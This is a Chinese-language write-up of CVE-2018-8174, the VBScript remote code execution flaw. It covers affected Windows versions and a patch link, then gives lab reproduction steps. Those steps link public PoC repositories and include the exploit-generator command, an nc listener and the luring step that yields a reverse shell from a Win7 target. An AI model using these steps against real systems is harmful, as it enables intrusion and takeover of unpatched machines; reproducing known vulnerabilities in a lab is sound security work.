漏洞描述:
VBScript引擎处理内存中对象的方式中存在一个远程执行代码漏洞。该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式来破坏内存。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。如果当前用户使用管理用户权限登录,则成功利用此漏洞的攻击者可以控制受影响的系统。然后,攻击者可能会安装程序。查看,更改或删除数据;或创建具有完全用户权限的新帐户。
在基于Web的攻击情形中,攻击者可能拥有一个旨在通过Internet Explorer利用此漏洞的特制网站,然后诱使用户查看该网站。攻击者还可能在承载IE呈现引擎的应用程序或Microsoft Office文档中嵌入标记为“初始化安全”的ActiveX控件。攻击者还可能利用受感染的网站以及接受或托管用户提供的内容或广告的网站。这些网站可能包含可以利用此漏洞的特制内容。
影响版本
Windows 7
Windows Server 2012 R2
Windows RT 8.1
Windows Server 2008
Windows Server 2012
Windows 8.1
Windows Server 2016
Windows Server 2008 R2
Windows 10
Windows 10服务器。
修复建议:
补丁地址:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174
选择对应系统,下载安装即可
漏洞复现
1、弹出计算器
POC地址:https://github.com/clark515/CVE_PoC/
解压缩包,将html文件复制到我们的web服务器上
用IE去访问htm文件时,靶机存在漏洞将弹出计算器。
但此次复现时,IE浏览器会提示用户"执行脚本",点击确定后才会弹出计算器
2、获取shell
kali:192.168.200.140
win7:192.168.200.129
POC地址:https://github.com/Yt1g3r/CVE-2018-8174_EXP
执行命令:python CVE-2018-8174.py -u http://192.168.200.140/exploit.html -o exp.rtf -i 192.168.200.140 -p 4444
-u:url地址,恶意地址/文件
-o:生成文档
-i:监听地址
-p:监听端口
生成的exploit.html、exp.rtf文件,复制到/var/www/html目录下
监听本地端口:nc -nvlp 4444
让靶机win7访问恶意地址:http://192.168.200.140/exploit.html
此处没有任何提醒,靶机上线